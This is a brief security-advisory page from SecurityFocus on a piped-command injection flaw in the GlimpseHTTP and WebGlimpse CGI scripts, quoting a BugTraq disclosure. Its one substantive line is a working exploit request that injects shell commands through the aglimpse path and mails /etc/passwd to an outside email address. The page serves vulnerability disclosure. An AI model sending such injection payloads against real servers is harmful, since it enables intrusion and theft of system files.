GlimpseHTTP and WebGlimpse Piped Command Vulnerability

From the BugTraq message by Razvan Dragomirescu (See Credit):

GET /cgi-bin/aglimpse|IFS=5;CMD=mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval5$CMD;echo


 

Privacy Statement
Copyright 2010, SecurityFocus